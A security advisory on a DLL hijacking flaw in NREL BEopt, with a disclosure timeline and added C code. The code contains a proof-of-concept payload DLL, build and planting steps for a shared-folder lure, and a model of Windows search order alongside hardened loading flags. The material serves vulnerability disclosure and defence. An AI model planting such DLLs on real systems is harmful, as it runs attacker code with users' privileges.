NREL BEopt 2.8.0 Insecure Library Loading Arbitrary Code Execution

Title: NREL BEopt 2.8.0 Insecure Library Loading Arbitrary Code Execution
Advisory ID: ZSL-2019-5513
Type: Remote/Local
Impact: System Access
Risk: (4/5)
Release Date: 09.03.2019
Summary
The BEopt™ (Building Energy Optimization Tool) software provides capabilities to evaluate residential building designs and identify cost-optimal efficiency packages at various levels of whole-house energy savings along the path to zero net energy.
Description
BEopt suffers from a DLL hijacking issue. The vulnerability is caused by the application loading libraries (sdl2.dll and libegl.dll) by bare file name, so they are resolved through the default DLL search order rather than from a fixed, trusted location. When a user opens a document with the application's .BEopt extension from a remote WebDAV or SMB share, that share becomes the current directory of the BEopt process, and the current directory is on the default search path. An attacker who places a DLL named sdl2.dll or libegl.dll next to the .BEopt file therefore gets that library loaded into the process, and its code runs with the privileges of the user who opened the file. Exploitation requires only that the user be tricked into opening the shared .BEopt file.
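The following is an added example written for this page; it is not the advisory's PoC (beopt_dllhijack.c is not reproduced here) and not NREL code. It has two halves. The first, compiled only on Windows, is the minimal payload DLL a tester would drop on the share under the names sdl2.dll and libegl.dll (the build command and the message-box payload are assumptions). The second, which builds anywhere, models the directory order Windows walks for a bare-name LoadLibrary call with SafeDllSearchMode on, and contrasts it with the hardened LoadLibraryEx search flags; the directory listings are constructed test data, and the model omits KnownDLLs and already-loaded modules, which Windows checks before any directory.

```c
/* Added example for ZSL-2019-5513, not the advisory's PoC. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#ifdef _WIN32
#include <windows.h>
/* Payload half. Assumed build line: gcc -shared -o sdl2.dll this_file.c
 * Copy the result as sdl2.dll and libegl.dll next to a lure .BEopt file on the share. */
BOOL APIENTRY DllMain(HINSTANCE hinst, DWORD reason, LPVOID reserved)
{
    (void)hinst; (void)reserved;
    if (reason == DLL_PROCESS_ATTACH)   /* runs as soon as BEopt loads the library */
        MessageBoxA(NULL, "Arbitrary code running inside BEopt", "ZSL-2019-5513", MB_OK);
    return TRUE;
}
#endif

/* Search-order half: directories consulted, in order, by LoadLibrary("sdl2.dll")
 * when the caller passes a bare file name and SafeDllSearchMode is on (default).
 * Opening a .BEopt file from a share makes that share the current directory. */
enum {
    DIR_APP = 0,  /* directory containing BEopt.exe */
    DIR_SYSTEM32, /* C:\Windows\System32 */
    DIR_SYSTEM16, /* C:\Windows\System (16-bit) */
    DIR_WINDOWS,  /* C:\Windows */
    DIR_CWD,      /* current directory: the WebDAV/SMB share */
    DIR_PATH,     /* directories listed in PATH */
    DIR_COUNT
};
#define NOT_FOUND (-1)

static const char *dir_names[DIR_COUNT] = {
    "application directory", "System32", "System (16-bit)",
    "Windows", "current directory (share)", "PATH"
};

/* A listing is a space-separated string of file names (constructed data).
 * Windows file names compare case-insensitively, so the match does too. */
static int has_file(const char *listing, const char *name)
{
    size_t n = strlen(name);
    const char *p = listing;
    while (*p) {
        while (*p == ' ') p++;
        const char *start = p;
        while (*p && *p != ' ') p++;
        if ((size_t)(p - start) == n) {
            size_t i;
            for (i = 0; i < n; i++)
                if (tolower((unsigned char)start[i]) != tolower((unsigned char)name[i])) break;
            if (i == n) return 1;
        }
    }
    return 0;
}

/* Vulnerable pattern, LoadLibrary("sdl2.dll"): first directory holding the file wins.
 * For a DLL the product does not ship and Windows does not provide, that is DIR_CWD. */
int resolve_loadlibrary(const char *dll, const char *const listings[DIR_COUNT])
{
    for (int d = 0; d < DIR_COUNT; d++)
        if (has_file(listings[d], dll)) return d;
    return NOT_FOUND;
}

/* Hardened pattern: LoadLibraryEx(dll, NULL,
 *   LOAD_LIBRARY_SEARCH_APPLICATION_DIR | LOAD_LIBRARY_SEARCH_SYSTEM32)
 * (or SetDefaultDllDirectories() with the same flags at start-up). The current
 * directory and PATH are never consulted, so a missing DLL fails the load
 * instead of silently taking the attacker's copy. */
int resolve_loadlibraryex_safe(const char *dll, const char *const listings[DIR_COUNT])
{
    static const int allowed[] = { DIR_APP, DIR_SYSTEM32 };
    for (size_t i = 0; i < sizeof allowed / sizeof allowed[0]; i++)
        if (has_file(listings[allowed[i]], dll)) return allowed[i];
    return NOT_FOUND;
}

/* Constructed scenario: the install directory lacks sdl2.dll and libegl.dll,
 * Windows does not provide them, and the attacker's share holds both. */
static const char *const beopt_scenario[DIR_COUNT] = {
    "beopt.exe beopt.exe.config",                   /* DIR_APP (constructed) */
    "kernel32.dll user32.dll ole32.dll",            /* DIR_SYSTEM32 (subset) */
    "",                                             /* DIR_SYSTEM16 */
    "explorer.exe",                                 /* DIR_WINDOWS */
    "lure.beopt sdl2.dll libegl.dll kernel32.dll",  /* DIR_CWD: the share */
    "git.exe"                                       /* DIR_PATH */
};

int main(void)
{
    const char *targets[] = { "sdl2.dll", "libegl.dll", "kernel32.dll" };
    for (size_t i = 0; i < sizeof targets / sizeof targets[0]; i++) {
        int v = resolve_loadlibrary(targets[i], beopt_scenario);
        int s = resolve_loadlibraryex_safe(targets[i], beopt_scenario);
        printf("%-12s LoadLibrary -> %s | LoadLibraryEx(safe) -> %s\n", targets[i],
               v == NOT_FOUND ? "not found" : dir_names[v],
               s == NOT_FOUND ? "not found (load fails)" : dir_names[s]);
    }
    return 0;
}
```

The model also shows why kernel32.dll on the same share is harmless: System32 precedes the current directory, so only DLLs absent from the earlier locations are hijackable this way. To confirm the condition on a real install before dropping a payload, watch BEopt.exe in Process Monitor for CreateFile results of NAME NOT FOUND on sdl2.dll and libegl.dll while opening a .BEopt document; the last probed path that ends on the share is the one the payload must occupy.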
Vendor
NREL - https://beopt.nrel.gov
Affected Version
2.8.0.0
2.7.0.0
2.6.0.1
Tested On
Microsoft Windows 7 Ultimate SP1 (EN)
Vendor Status
[06.02.2019] Vulnerability discovered.
[08.02.2019] Vendor contacted.
[08.02.2019] Vendor responds asking more details.
[09.02.2019] Sent details to the vendor.
[18.02.2019] No response from the vendor.
[19.02.2019] Asked vendor for status update.
[08.03.2019] No response from the vendor.
[09.03.2019] Public security advisory released.
PoC
beopt_dllhijack.c
Credits
Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk>
References
[1] https://packetstormsecurity.com/files/152043
[2] https://cxsecurity.com/issue/WLB-2019030108
[3] https://exchange.xforce.ibmcloud.com/vulnerabilities/158065
Changelog
[09.03.2019] - Initial release
[12.03.2019] - Added reference [1]
[13.03.2019] - Added reference [2]
[17.03.2019] - Added reference [3]
Contact
Zero Science Lab

Web: http://www.zeroscience.mk
e-mail: lab@zeroscience.mk